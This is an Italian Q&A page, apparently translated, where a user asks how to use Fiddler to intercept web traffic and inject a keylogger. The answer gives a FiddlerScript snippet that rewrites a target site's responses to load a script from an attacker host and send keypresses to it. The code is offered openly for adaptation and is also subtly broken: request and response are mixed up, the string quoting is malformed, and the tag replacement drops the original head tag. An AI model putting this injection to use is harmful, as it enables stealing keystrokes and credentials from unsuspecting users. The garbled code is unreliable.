Intercetta il traffico web usando Fiddler e aggiungi una funzione keylogger

1

Possiamo intercettare il traffico web usando Fiddler e iniettare una funzionalità come il keylogger prima della richiesta al server?

    
posta Adrian Gilbert 19.01.2017 - 00:02
fonte

1 risposta

1

Sì, puoi farlo.

Prima di tutto è necessario aggiungere l'estensione del violinista chiamata script Fiddler . Questo ti permette di gestire eventi Fiddler come OnBeforeRequest, OnBeforeResponse etc ..

Poiché devi intercettare il traffico su richiesta, devi intercettare l'evento OnBeforeRequest.

Di seguito è riportato un codice di esempio che è possibile utilizzare per ottenere ciò utilizzando lo script del violinista. Tieni presente che non sarai in grado di ottenere esattamente ciò di cui hai bisogno da questo script, ma usalo come avvio e modificalo in base alle tue esigenze.

if (oSession.HostnameIs("www.yourtargetsite.com") && oSession.HTTPMethodIs("POST")) // or what ever your web method
{   
    oSession.utilDecodeResponse();
    var body = System.Text.Encoding.UTF8GetString(oSession.responseBodyBytes); // grab the request body here

    var logger = '<script src="http://yourhackingsite.com/logger.js"></script>';logger+='<script>destination=http://yourhackingsite.com/LogKeyPress?key=";</script>';

    body = body.replace("<head>",logger + "</head>");
    oSession.utilDecodeResponseBody(body); // inject your custom altered body   
}
    
risposta data 19.01.2017 - 00:35
fonte

Leggi altre domande sui tag